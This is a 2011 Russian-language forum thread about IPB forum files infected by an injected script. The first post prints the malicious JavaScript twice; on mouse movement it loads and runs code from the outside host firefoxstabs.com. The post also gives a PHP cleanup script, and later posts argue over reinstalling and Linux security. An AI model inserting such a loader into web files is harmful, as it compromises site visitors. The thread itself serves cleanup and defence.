вирус на FTP в index.* и *.JS файлах

Правила раздела

Здесь обсуждаются вопросы по настройке и администрированию форумов IPB 3.x.
Пожалуйста, не оффтопьте, если зашли сюда случайно, и обратите внимание на соседние разделы.
Установка, настройка и обслуживание форумов IPB 2.x.
Оформление форумов, включая верстку скинов.
Размещение рекламы на форумах.
SEO оптимизация форума.
Техническая поддержка наших скинов и модов.

Страница 1 из 1

Вы не можете создавать новые темы
Вы не можете отвечать в этой теме

вирус на FTP в index.* и *.JS файлах <script type=" ... http://firefoxstabs.com/ ... </script

#1 Qartvela™

Advanced

Группа: IPB Specialist
Сообщений: 135
Регистрация: 15-Февраль 11
Репутация: 17
IPB version:3.1.x

Отправлено 21 Май 2011 - 15:59

добавляется в конце файла index.* & *.JS

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});</script>
document.write('<scr'+'ipt src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js\"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});

мне это помогло, поможет и вам.

удаляет из index.* & *.JS вредоносный код

1) просканировать компьютер на вирусы
2) обязательно смените пароль на FTP
3) загрузить firefoxtabs_remover.php на FTP и запустите _http://yourdomain/firefoxtabs_remover.php

<?php 
define ('BR', "<br />\r\n"); 
$srch='<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></script><script type="text/javascript">var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript(\'http://firefoxstabs.com/\' + Math.random().toString().substring(3) + \'.js\', function() {flag = 2;});}});});</script>'; 
$srch2="document.write('<scr'+'ipt src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js\"></scr'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});"; 

function clean_file($file)
{ 
global $srch;
global $srch2; 
    $basename=basename($file); 
    $filename=substr($basename, 0, strrpos($basename, '.')); 
    //print($file.BR);
    
        $f_in=file_get_contents($file); 
        if (strpos($f_in, $srch)!=false) { 
  
              print("<b>".$file."</b><br>");
            $f_in=str_replace($srch, '', $f_in); 
            file_put_contents($file, $f_in); 
        } 
        if (strpos($f_in, $srch2)!=false) { 
        
            print("<b>".$file."</b><br>");
            
            $f_in=str_replace($srch2, '', $f_in); 
            file_put_contents($file, $f_in); 
        } 
    
} 

function firefoxtabs_remover($dir){ 
    if ($objs = glob($dir."/*")) { 
        foreach($objs as $obj) { 
            if (is_dir($obj)) firefoxtabs_remover($obj); 
            else clean_file($obj); 
        } 
    } 
} 

$dir=realpath('./'); 
firefoxtabs_remover($dir); 
?>

Вложений

firefoxtabs_remover.php (1,73К)
Количество загрузок: 22

Сообщение изменено: Qartvela™ (21 Май 2011 - 16:06)

Наверх of the page up there ^

#2 Fisana

На PM не отвечаю

Группа: IPB Skins Team
Сообщений: 12 892
Регистрация: 21-Ноябрь 05
Репутация: 562
Откуда:Из интернетов
IPB version:3.1.x

Отправлено 21 Май 2011 - 17:15

Спасибо.
Тему закреплю пока. Уже обращались с такой проблемой.

Наверх of the page up there ^

#3 Ritsuka

Advanced

Группа: IPB Skins Team
Сообщений: 981
Регистрация: 08-Июнь 09
Репутация: 246
IPB version:3.2.x

Отправлено 21 Май 2011 - 18:36

А вообще, большинству будет достаточно просто перезалить дистрибутив форума. Если никаких "модов", основанных на правке файлов, не ставили. И просто, и быстро, и полезно

Наверх of the page up there ^

#4 Qartvela™

Advanced

Группа: IPB Specialist
Сообщений: 135
Регистрация: 15-Февраль 11
Репутация: 17
IPB version:3.1.x

автор темы Отправлено 21 Май 2011 - 20:11

Ritsuka сказал(а):

И просто, и быстро, и полезно

перезалить дистрибутив форума?

1) просканировать компьютер на вирусы
2) обязательно смените пароль на FTP
это не нужно делать?

Ritsuka сказал(а):

достаточно просто перезалить дистрибутив форума

и это проще чем
3) загрузить firefoxtabs_remover.php на FTP и запустите _http://yourdomain/firefoxtabs_remover.php

Наверх of the page up there ^

#5 Ritsuka

Advanced

Группа: IPB Skins Team
Сообщений: 981
Регистрация: 08-Июнь 09
Репутация: 246
IPB version:3.2.x

Отправлено 21 Май 2011 - 23:02

Конечно, проще. Запустите этот скрипт на форуме, где больше 100Мб аттачей и вы поймете, о чем я. Не говоря уже о форумах, где аттачей под 3Тб. Ваш скрипт загружает в память по очереди абсолютно все файлы из каталога, включая и бинарные аттачи, а затем выполняет поиск по их содержимому. Наверное, это модно - гонять ресурсы сервера впустую. Но простая перезаливка дистрибутива - куда экономнее и быстрее, если ваш форум хоть чуть-чуть крупнее пустого форума на localhost.

А от вирусов помогает Linux. Как и от воровства паролей.

Наверх of the page up there ^

#6 muslimgauze

Advanced

Группа: Пользователи
Сообщений: 509
Регистрация: 01-Май 10
Репутация: 6
IPB version:3.2.x

Отправлено 25 Май 2011 - 00:40

Ritsuka 21 Май 2011 - 23:02 сказал(а):

А от вирусов помогает Linux. Как и от воровства паролей.

увы, но это уже давно не так
да, чистых вирусов (работоспособных) под *nix нет, но зато есть МАССА эксплойтов!
да и никакой линукс не спасет от криворукости админа!

Наверх of the page up there ^

#7 Ritsuka

Advanced

Группа: IPB Skins Team
Сообщений: 981
Регистрация: 08-Июнь 09
Репутация: 246
IPB version:3.2.x

Отправлено 25 Май 2011 - 07:37

Цитата

да, чистых вирусов (работоспособных) под *nix нет, но зато есть МАССА эксплойтов!

99,9% этих "эксплоитов" заключаются в получении локальным пользователем root-привилегий. Если вы единственный пользователь ПК, и вы не запускаете на локали публичных вебсервисов (а еще лучше, сидите за файрволом) - вам на 99,99% ничего не грозит (а я в этой теме говорю именно о десктопе, откуда и была утечка ftp-паролей).

В самом linux проблем нет, проблемы бывают в дополнительном ПО. Но, во-первых, вероятность "удачного сочетания" уязвимого ПО + незакрытой дыры в ядре на отдельно взятой системе с не отключенными регулярными обновлениями стремится куда-то в сторону минус бесконечности. Во-вторых, у любого приличного дистрибутива есть своя система проверенных репозиториев/пакетов с проверкой и регулярными обновлениями.

Ну а если пользователь качает неизвестные бинарники и запускает их под рутом... Согласен, идиота ничто не спасет. Вспоминается текстовый вирус в стиле "привет, я вирус! пожалуйста, разошлите этот текст всем знакомым и самостоятельно отформатируйте жесткие диски".

Наверх of the page up there ^

#8 muslimgauze

Advanced

Группа: Пользователи
Сообщений: 509
Регистрация: 01-Май 10
Репутация: 6
IPB version:3.2.x

Отправлено 25 Май 2011 - 10:31

Ritsuka 25 Май 2011 - 07:37 сказал(а):

в 99% случаев "root-привилегии" получают УДАЛЕННЫЕ пользователи, не имеющие физического доступа у компу
учитывая, что линукс это ТОЛЬКО ядро, дыры есть и в нём, иначе не было бы патчей, исправляющих проблемы с безопасностью!
и никакая "своя система проверенных репозиториев/пакетов" не застрахована от ошибок и проблем

Сообщение изменено: muslimgauze (25 Май 2011 - 11:00)

Наверх of the page up there ^

#9 Ritsuka

Advanced

Группа: IPB Skins Team
Сообщений: 981
Регистрация: 08-Июнь 09
Репутация: 246
IPB version:3.2.x

Отправлено 25 Май 2011 - 14:03

Не буду более спорить, ибо оффтоп, да и ничего мы друг другу не докажем.

Наверх of the page up there ^

#10 muslimgauze

Advanced

Группа: Пользователи
Сообщений: 509
Регистрация: 01-Май 10
Репутация: 6
IPB version:3.2.x

Отправлено 25 Май 2011 - 17:19

Ritsuka 25 Май 2011 - 14:03 сказал(а):

Не буду более спорить, ибо оффтоп, да и ничего мы друг другу не докажем.

у меня опыта с кривыми руками и *nix лет так 10-12

Наверх of the page up there ^

#11 Hymera

Newbie

Группа: Пользователи
Сообщений: 4
Регистрация: 13-Сентябрь 08
Репутация: 0
IPB version:2.2.1

Отправлено 02 Апрель 2012 - 13:21

А что делать, если яндекс ругается? Причем ему не нравятся именно файлы с базовыми скриптами движка? Там где графический редактор сообщений к примеру, или выпадающие меню? Хостеры не нашли никаких вирусов, посоветовали обращатся к разработчикам. Может у кого то еще такая проблема с 3.2.3?